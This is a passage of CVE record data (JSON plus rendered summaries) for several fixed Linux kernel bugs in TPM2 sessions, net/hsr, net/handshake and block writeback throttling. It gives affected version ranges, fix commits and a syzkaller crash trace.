"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/char/tpm/tpm2-cmd.c",
"drivers/char/tpm/tpm2-sessions.c",
"include/linux/tpm.h",
"security/keys/trusted-keys/trusted_tpm2.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "47e676ce4d68f461dfcab906f6aeb254f7276deb",
"status": "affected",
"version": "1085b8276bb4239daa7008f0dcd5c973e4bd690f",
"versionType": "git"
},
{
"lessThan": "04a3aa6e8c5f878cc51a8a1c90b6d3c54079bc43",
"status": "affected",
"version": "1085b8276bb4239daa7008f0dcd5c973e4bd690f",
"versionType": "git"
},
{
"lessThan": "6e9722e9a7bfe1bbad649937c811076acf86e1fd",
"status": "affected",
"version": "1085b8276bb4239daa7008f0dcd5c973e4bd690f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/char/tpm/tpm2-cmd.c",
"drivers/char/tpm/tpm2-sessions.c",
"include/linux/tpm.h",
"security/keys/trusted-keys/trusted_tpm2.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.10"
},
{
"lessThan": "6.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.66",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc1",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.66",
"versionStartIncluding": "6.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc1",
"versionStartIncluding": "6.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntpm2-sessions: Fix out of range indexing in name_size\n\n\u0027name_size\u0027 does not have any range checks, and it just directly indexes\nwith TPM_ALG_ID, which could lead into memory corruption at worst.\n\nAddress the issue by only processing known values and returning -EINVAL for\nunrecognized values.\n\nMake also \u0027tpm_buf_append_name\u0027 and \u0027tpm_buf_fill_hmac_session\u0027 fallible so\nthat errors are detected before causing any spurious TPM traffic.\n\nEnd also the authorization session on failure in both of the functions, as\nthe session state would be then by definition corrupted."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-17T15:37:55.698Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/47e676ce4d68f461dfcab906f6aeb254f7276deb"
},
{
"url": "https://git.kernel.org/stable/c/04a3aa6e8c5f878cc51a8a1c90b6d3c54079bc43"
},
{
"url": "https://git.kernel.org/stable/c/6e9722e9a7bfe1bbad649937c811076acf86e1fd"
}
],
"title": "tpm2-sessions: Fix out of range indexing in name_size",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68792",
"datePublished": "2026-01-13T15:29:04.226Z",
"dateReserved": "2025-12-24T10:30:51.037Z",
"dateUpdated": "2026-01-17T15:37:55.698Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68776 (GCVE-0-2025-68776)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-19 12:18
Title
net/hsr: fix NULL pointer dereference in prp_get_untagged_frame()
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/hsr: fix NULL pointer dereference in prp_get_untagged_frame()
prp_get_untagged_frame() calls __pskb_copy() to create frame->skb_std
but doesn't check if the allocation failed. If __pskb_copy() returns
NULL, skb_clone() is called with a NULL pointer, causing a crash:
Oops: general protection fault, probably for non-canonical address 0xdffffc000000000f: 0000 [#1] SMP KASAN NOPTI
KASAN: null-ptr-deref in range [0x0000000000000078-0x000000000000007f]
CPU: 0 UID: 0 PID: 5625 Comm: syz.1.18 Not tainted syzkaller #0 PREEMPT(full)
Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014
RIP: 0010:skb_clone+0xd7/0x3a0 net/core/skbuff.c:2041
Code: 03 42 80 3c 20 00 74 08 4c 89 f7 e8 23 29 05 f9 49 83 3e 00 0f 85 a0 01 00 00 e8 94 dd 9d f8 48 8d 6b 7e 49 89 ee 49 c1 ee 03 <43> 0f b6 04 26 84 c0 0f 85 d1 01 00 00 44 0f b6 7d 00 41 83 e7 0c
RSP: 0018:ffffc9000d00f200 EFLAGS: 00010207
RAX: ffffffff892235a1 RBX: 0000000000000000 RCX: ffff88803372a480
RDX: 0000000000000000 RSI: 0000000000000820 RDI: 0000000000000000
RBP: 000000000000007e R08: ffffffff8f7d0f77 R09: 1ffffffff1efa1ee
R10: dffffc0000000000 R11: fffffbfff1efa1ef R12: dffffc0000000000
R13: 0000000000000820 R14: 000000000000000f R15: ffff88805144cc00
FS: 0000555557f6d500(0000) GS:ffff88808d72f000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000555581d35808 CR3: 000000005040e000 CR4: 0000000000352ef0
Call Trace:
<TASK>
hsr_forward_do net/hsr/hsr_forward.c:-1 [inline]
hsr_forward_skb+0x1013/0x2860 net/hsr/hsr_forward.c:741
hsr_handle_frame+0x6ce/0xa70 net/hsr/hsr_slave.c:84
__netif_receive_skb_core+0x10b9/0x4380 net/core/dev.c:5966
__netif_receive_skb_one_core net/core/dev.c:6077 [inline]
__netif_receive_skb+0x72/0x380 net/core/dev.c:6192
netif_receive_skb_internal net/core/dev.c:6278 [inline]
netif_receive_skb+0x1cb/0x790 net/core/dev.c:6337
tun_rx_batched+0x1b9/0x730 drivers/net/tun.c:1485
tun_get_user+0x2b65/0x3e90 drivers/net/tun.c:1953
tun_chr_write_iter+0x113/0x200 drivers/net/tun.c:1999
new_sync_write fs/read_write.c:593 [inline]
vfs_write+0x5c9/0xb30 fs/read_write.c:686
ksys_write+0x145/0x250 fs/read_write.c:738
do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]
do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94
entry_SYSCALL_64_after_hwframe+0x77/0x7f
RIP: 0033:0x7f0449f8e1ff
Code: 89 54 24 18 48 89 74 24 10 89 7c 24 08 e8 f9 92 02 00 48 8b 54 24 18 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 01 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 31 44 89 c7 48 89 44 24 08 e8 4c 93 02 00 48
RSP: 002b:00007ffd7ad94c90 EFLAGS: 00000293 ORIG_RAX: 0000000000000001
RAX: ffffffffffffffda RBX: 00007f044a1e5fa0 RCX: 00007f0449f8e1ff
RDX: 000000000000003e RSI: 0000200000000500 RDI: 00000000000000c8
RBP: 00007ffd7ad94d20 R08: 0000000000000000 R09: 0000000000000000
R10: 000000000000003e R11: 0000000000000293 R12: 0000000000000001
R13: 00007f044a1e5fa0 R14: 00007f044a1e5fa0 R15: 0000000000000003
</TASK>
Add a NULL check immediately after __pskb_copy() to handle allocation
failures gracefully.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: f266a683a4804dc499efc6c2206ef68efed029d0, < 3ce95a57d8a1f0e20b637cdeddaaed81831ca819 (git) |
| Linux | Linux | Affected: f266a683a4804dc499efc6c2206ef68efed029d0, < c851e43b88b40bb7c20176c51cbf4f8c8d960dd9 (git) |
| Linux | Linux | Affected: f266a683a4804dc499efc6c2206ef68efed029d0, < 7be6d25f4d974e44918ba3a5d58ebb9d36879087 (git) |
| Linux | Linux | Affected: f266a683a4804dc499efc6c2206ef68efed029d0, < 8f289fa12926aae44347ca7d490e216555d8f255 (git) |
| Linux | Linux | Affected: f266a683a4804dc499efc6c2206ef68efed029d0, < 1742974c24a9c1f1fd2e5edca0cbaccb720b397a (git) |
| Linux | Linux | Affected: f266a683a4804dc499efc6c2206ef68efed029d0, < 6220d38a08f8837575cd8f830928b49a3a5a5095 (git) |
| Linux | Linux | Affected: f266a683a4804dc499efc6c2206ef68efed029d0, < 188e0fa5a679570ea35474575e724d8211423d17 (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/hsr/hsr_forward.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "3ce95a57d8a1f0e20b637cdeddaaed81831ca819",
"status": "affected",
"version": "f266a683a4804dc499efc6c2206ef68efed029d0",
"versionType": "git"
},
{
"lessThan": "c851e43b88b40bb7c20176c51cbf4f8c8d960dd9",
"status": "affected",
"version": "f266a683a4804dc499efc6c2206ef68efed029d0",
"versionType": "git"
},
{
"lessThan": "7be6d25f4d974e44918ba3a5d58ebb9d36879087",
"status": "affected",
"version": "f266a683a4804dc499efc6c2206ef68efed029d0",
"versionType": "git"
},
{
"lessThan": "8f289fa12926aae44347ca7d490e216555d8f255",
"status": "affected",
"version": "f266a683a4804dc499efc6c2206ef68efed029d0",
"versionType": "git"
},
{
"lessThan": "1742974c24a9c1f1fd2e5edca0cbaccb720b397a",
"status": "affected",
"version": "f266a683a4804dc499efc6c2206ef68efed029d0",
"versionType": "git"
},
{
"lessThan": "6220d38a08f8837575cd8f830928b49a3a5a5095",
"status": "affected",
"version": "f266a683a4804dc499efc6c2206ef68efed029d0",
"versionType": "git"
},
{
"lessThan": "188e0fa5a679570ea35474575e724d8211423d17",
"status": "affected",
"version": "f266a683a4804dc499efc6c2206ef68efed029d0",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/hsr/hsr_forward.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.17"
},
{
"lessThan": "3.17",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.248",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.198",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.160",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.248",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.198",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.160",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "3.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "3.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/hsr: fix NULL pointer dereference in prp_get_untagged_frame()\n\nprp_get_untagged_frame() calls __pskb_copy() to create frame-\u003eskb_std\nbut doesn\u0027t check if the allocation failed. If __pskb_copy() returns\nNULL, skb_clone() is called with a NULL pointer, causing a crash:\n\nOops: general protection fault, probably for non-canonical address 0xdffffc000000000f: 0000 [#1] SMP KASAN NOPTI\nKASAN: null-ptr-deref in range [0x0000000000000078-0x000000000000007f]\nCPU: 0 UID: 0 PID: 5625 Comm: syz.1.18 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nRIP: 0010:skb_clone+0xd7/0x3a0 net/core/skbuff.c:2041\nCode: 03 42 80 3c 20 00 74 08 4c 89 f7 e8 23 29 05 f9 49 83 3e 00 0f 85 a0 01 00 00 e8 94 dd 9d f8 48 8d 6b 7e 49 89 ee 49 c1 ee 03 \u003c43\u003e 0f b6 04 26 84 c0 0f 85 d1 01 00 00 44 0f b6 7d 00 41 83 e7 0c\nRSP: 0018:ffffc9000d00f200 EFLAGS: 00010207\nRAX: ffffffff892235a1 RBX: 0000000000000000 RCX: ffff88803372a480\nRDX: 0000000000000000 RSI: 0000000000000820 RDI: 0000000000000000\nRBP: 000000000000007e R08: ffffffff8f7d0f77 R09: 1ffffffff1efa1ee\nR10: dffffc0000000000 R11: fffffbfff1efa1ef R12: dffffc0000000000\nR13: 0000000000000820 R14: 000000000000000f R15: ffff88805144cc00\nFS: 0000555557f6d500(0000) GS:ffff88808d72f000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000555581d35808 CR3: 000000005040e000 CR4: 0000000000352ef0\nCall Trace:\n \u003cTASK\u003e\n hsr_forward_do net/hsr/hsr_forward.c:-1 [inline]\n hsr_forward_skb+0x1013/0x2860 net/hsr/hsr_forward.c:741\n hsr_handle_frame+0x6ce/0xa70 net/hsr/hsr_slave.c:84\n __netif_receive_skb_core+0x10b9/0x4380 net/core/dev.c:5966\n __netif_receive_skb_one_core net/core/dev.c:6077 [inline]\n __netif_receive_skb+0x72/0x380 net/core/dev.c:6192\n netif_receive_skb_internal net/core/dev.c:6278 
[inline]\n netif_receive_skb+0x1cb/0x790 net/core/dev.c:6337\n tun_rx_batched+0x1b9/0x730 drivers/net/tun.c:1485\n tun_get_user+0x2b65/0x3e90 drivers/net/tun.c:1953\n tun_chr_write_iter+0x113/0x200 drivers/net/tun.c:1999\n new_sync_write fs/read_write.c:593 [inline]\n vfs_write+0x5c9/0xb30 fs/read_write.c:686\n ksys_write+0x145/0x250 fs/read_write.c:738\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\nRIP: 0033:0x7f0449f8e1ff\nCode: 89 54 24 18 48 89 74 24 10 89 7c 24 08 e8 f9 92 02 00 48 8b 54 24 18 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 01 00 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff 77 31 44 89 c7 48 89 44 24 08 e8 4c 93 02 00 48\nRSP: 002b:00007ffd7ad94c90 EFLAGS: 00000293 ORIG_RAX: 0000000000000001\nRAX: ffffffffffffffda RBX: 00007f044a1e5fa0 RCX: 00007f0449f8e1ff\nRDX: 000000000000003e RSI: 0000200000000500 RDI: 00000000000000c8\nRBP: 00007ffd7ad94d20 R08: 0000000000000000 R09: 0000000000000000\nR10: 000000000000003e R11: 0000000000000293 R12: 0000000000000001\nR13: 00007f044a1e5fa0 R14: 00007f044a1e5fa0 R15: 0000000000000003\n \u003c/TASK\u003e\n\nAdd a NULL check immediately after __pskb_copy() to handle allocation\nfailures gracefully."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-19T12:18:56.073Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3ce95a57d8a1f0e20b637cdeddaaed81831ca819"
},
{
"url": "https://git.kernel.org/stable/c/c851e43b88b40bb7c20176c51cbf4f8c8d960dd9"
},
{
"url": "https://git.kernel.org/stable/c/7be6d25f4d974e44918ba3a5d58ebb9d36879087"
},
{
"url": "https://git.kernel.org/stable/c/8f289fa12926aae44347ca7d490e216555d8f255"
},
{
"url": "https://git.kernel.org/stable/c/1742974c24a9c1f1fd2e5edca0cbaccb720b397a"
},
{
"url": "https://git.kernel.org/stable/c/6220d38a08f8837575cd8f830928b49a3a5a5095"
},
{
"url": "https://git.kernel.org/stable/c/188e0fa5a679570ea35474575e724d8211423d17"
}
],
"title": "net/hsr: fix NULL pointer dereference in prp_get_untagged_frame()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68776",
"datePublished": "2026-01-13T15:28:52.766Z",
"dateReserved": "2025-12-24T10:30:51.035Z",
"dateUpdated": "2026-01-19T12:18:56.073Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68775 (GCVE-0-2025-68775)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:28 – Updated: 2026-01-13 15:28
Title
net/handshake: duplicate handshake cancellations leak socket
Summary
In the Linux kernel, the following vulnerability has been resolved:
net/handshake: duplicate handshake cancellations leak socket
When a handshake request is cancelled it is removed from the
handshake_net->hn_requests list, but it is still present in the
handshake_rhashtbl until it is destroyed.
If a second cancellation request arrives for the same handshake request,
then remove_pending() will return false... and assuming
HANDSHAKE_F_REQ_COMPLETED isn't set in req->hr_flags, we'll continue
processing through the out_true label, where we put another reference on
the sock and a refcount underflow occurs.
This can happen for example if a handshake times out - particularly if
the SUNRPC client sends the AUTH_TLS probe to the server but doesn't
follow it up with the ClientHello due to a problem with tlshd. When the
timeout is hit on the server, the server will send a FIN, which triggers
a cancellation request via xs_reset_transport(). When the timeout is
hit on the client, another cancellation request happens via
xs_tls_handshake_sync().
Add a test_and_set_bit(HANDSHAKE_F_REQ_COMPLETED) in the pending cancel
path so duplicate cancels can be detected.
Severity
No CVSS data available.
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Linux | Linux | Affected: 3b3009ea8abb713b022d94fba95ec270cf6e7eae , < 011ae80c49d9bfa5b4336f8bd387cd25c7593663 (git) |
| Linux | Linux | Affected: 3b3009ea8abb713b022d94fba95ec270cf6e7eae , < e1641177e7fb48a0a5a06658d4aab51da6656659 (git) |
| Linux | Linux | Affected: 3b3009ea8abb713b022d94fba95ec270cf6e7eae , < 3c330f1dee3cd92b57e19b9d21dc8ce5970b09be (git) |
| Linux | Linux | Affected: 3b3009ea8abb713b022d94fba95ec270cf6e7eae , < 15564bd67e2975002f2a8e9defee33e321d3183f (git) |
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/handshake/request.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "011ae80c49d9bfa5b4336f8bd387cd25c7593663",
"status": "affected",
"version": "3b3009ea8abb713b022d94fba95ec270cf6e7eae",
"versionType": "git"
},
{
"lessThan": "e1641177e7fb48a0a5a06658d4aab51da6656659",
"status": "affected",
"version": "3b3009ea8abb713b022d94fba95ec270cf6e7eae",
"versionType": "git"
},
{
"lessThan": "3c330f1dee3cd92b57e19b9d21dc8ce5970b09be",
"status": "affected",
"version": "3b3009ea8abb713b022d94fba95ec270cf6e7eae",
"versionType": "git"
},
{
"lessThan": "15564bd67e2975002f2a8e9defee33e321d3183f",
"status": "affected",
"version": "3b3009ea8abb713b022d94fba95ec270cf6e7eae",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/handshake/request.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.4"
},
{
"lessThan": "6.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.120",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.12.*",
"status": "unaffected",
"version": "6.12.64",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.120",
"versionStartIncluding": "6.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.12.64",
"versionStartIncluding": "6.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "6.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/handshake: duplicate handshake cancellations leak socket\n\nWhen a handshake request is cancelled it is removed from the\nhandshake_net-\u003ehn_requests list, but it is still present in the\nhandshake_rhashtbl until it is destroyed.\n\nIf a second cancellation request arrives for the same handshake request,\nthen remove_pending() will return false... and assuming\nHANDSHAKE_F_REQ_COMPLETED isn\u0027t set in req-\u003ehr_flags, we\u0027ll continue\nprocessing through the out_true label, where we put another reference on\nthe sock and a refcount underflow occurs.\n\nThis can happen for example if a handshake times out - particularly if\nthe SUNRPC client sends the AUTH_TLS probe to the server but doesn\u0027t\nfollow it up with the ClientHello due to a problem with tlshd. When the\ntimeout is hit on the server, the server will send a FIN, which triggers\na cancellation request via xs_reset_transport(). When the timeout is\nhit on the client, another cancellation request happens via\nxs_tls_handshake_sync().\n\nAdd a test_and_set_bit(HANDSHAKE_F_REQ_COMPLETED) in the pending cancel\npath so duplicate cancels can be detected."
}
],
"providerMetadata": {
"dateUpdated": "2026-01-13T15:28:52.069Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/011ae80c49d9bfa5b4336f8bd387cd25c7593663"
},
{
"url": "https://git.kernel.org/stable/c/e1641177e7fb48a0a5a06658d4aab51da6656659"
},
{
"url": "https://git.kernel.org/stable/c/3c330f1dee3cd92b57e19b9d21dc8ce5970b09be"
},
{
"url": "https://git.kernel.org/stable/c/15564bd67e2975002f2a8e9defee33e321d3183f"
}
],
"title": "net/handshake: duplicate handshake cancellations leak socket",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2025-68775",
"datePublished": "2026-01-13T15:28:52.069Z",
"dateReserved": "2025-12-24T10:30:51.035Z",
"dateUpdated": "2026-01-13T15:28:52.069Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-68807 (GCVE-0-2025-68807)
Vulnerability from cvelistv5 – Published: 2026-01-13 15:29 – Updated: 2026-01-13 15:29
Title
block: fix race between wbt_enable_default and IO submission
Summary
In the Linux kernel, the following vulnerability has been resolved:
block: fix race between wbt_enable_default and IO submission
When wbt_enable_default() is moved out of queue freezing in elevator_change(),
it can cause the wbt inflight counter to become negative (-1), leading to hung
tasks in the writeback path. Tasks get stuck in wbt_wait() because the counter
is in an inconsistent state.
The issue occurs because wbt_enable_default() could race with IO submission,
allowing the counter to be decremented before proper initialization. This manifests
as:
rq_wait[0]:
inflight: -1
has_waiters: True
rwb_enabled() checks the state, which can be updated exactly between wbt_wait()
(rq_qos_throttle()) and wbt_track()(rq_qos_track()), then the inflight counter
will become negative.
And results in hung task warnings like:
task:kworker/u24:39 state:D stack:0 pid:14767
Call Trace:
rq_qos_wait+0xb4/0x150
wbt_wait+0xa9/0x100
__rq_qos_throttle+0x24/0x40
blk_mq_submit_bio+0x672/0x7b0
...
Fix this by:
1. Splitting wbt_enable_default() into:
- __wbt_enable_default(): Returns true if wbt_init() should be called
- wbt_enable_default(): Wrapper for existing callers (no init)
- wbt_init_enable_default(): New function that checks and inits WBT
2. Using wbt_init_enable_default() in blk_register_queue() to ensure
proper initialization during queue registration
3. Move wbt_init() out of wbt_enable_default() which is only for enabling
disabled wbt from bfq and iocost, and wbt_init() isn't needed. Then the
original lock warning can be avoided.
4. Removing the ELEVATOR_FLAG_ENABLE_WBT_ON_EXIT flag and its handling
code since it's no longer needed
This ensures WBT is properly initialized before any IO can be submitted,
preventing the counter from going negative.
Severity
No CVSS data available.
{
"containers": {
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"block/bfq-iosched.c",
"block/blk-sysfs.c",
"block/blk-wbt.c",
"block/blk-wbt.h",
"block/elevator.c",
"block/elevator.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f55201fb3becff6a903fd29f4d1147cc7e91eb0c",
"status": "affected",
"version": "78c271344b6f64ce24c845e54903e09928cf2061",
"versionType": "git"
},
{
"lessThan": "9869d3a6fed381f3b98404e26e1afc75d680cbf9",
"status": "affected",
"version": "78c271344b6f64ce24c845e54903e09928cf2061",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"block/bfq-iosched.c",
"block/blk-sysfs.c",
"block/blk-wbt.c",
"block/blk-wbt.h",
"block/elevator.c",
"block/elevator.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.16"
},
{
"lessThan": "6.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.18.*",
"status": "unaffected",
"version": "6.18.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.19-rc2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.18.3",
"versionStartIncluding": "6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.19-rc2",
"versionStartIncluding": "6.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nblock: fix race between wbt_enable_default and IO submission\n\nWhen wbt_enable_default() is moved out of queue freezing in elevator_change(),\nit can cause the wbt inflight counter to become negative (-1), leading to hung\ntasks in the writeback path. Tasks get stuck in wbt_wait() because the counter\nis in an inconsistent state.\n\nThe issue occurs because wbt_enable_default() could race with IO submission,\nallowing the counter to be decremented before proper initialization. This manifests\nas:\n\n rq_wait[0]:\n inflight: -1\n has_waiters: True\n\nrwb_enabled() checks the state, which can be updated exactly between wbt_wait()\n(rq_qos_throttle()) and wbt_track()(rq_qos_track()), then the inflight counter\nwill become negative.\n\nAnd results in hung task warnings like:\n task:kworker/u24:39 state:D stack:0 pid:14767\n Call Trace:\n rq_qos_wait+0xb4/0x150\n wbt_wait+0xa9/0x100\n __rq_qos_throttle+0x24/0x40\n blk_mq_submit_bio+0x672/0x7b0\n ...\n\nFix this by:\n\n1. Splitting wbt_enable_default() into:\n - __wbt_enable_default(): Returns true if wbt_init() should be called\n - wbt_enable_default(): Wrapper for existing callers (no init)\n - wbt_init_enable_default(): New function that checks and inits WBT\n\n2. Using wbt_init_enable_default() in blk_register_queue() to ensure\n proper initialization during queue registration\n\n3. Move wbt_init() out of wbt_enable_default() which is only for enabling\n disabled wbt from bfq and iocost, and wbt_init() isn\u0027t needed. Then the\n original lock warning can be avoided.\n\n4. Removing the 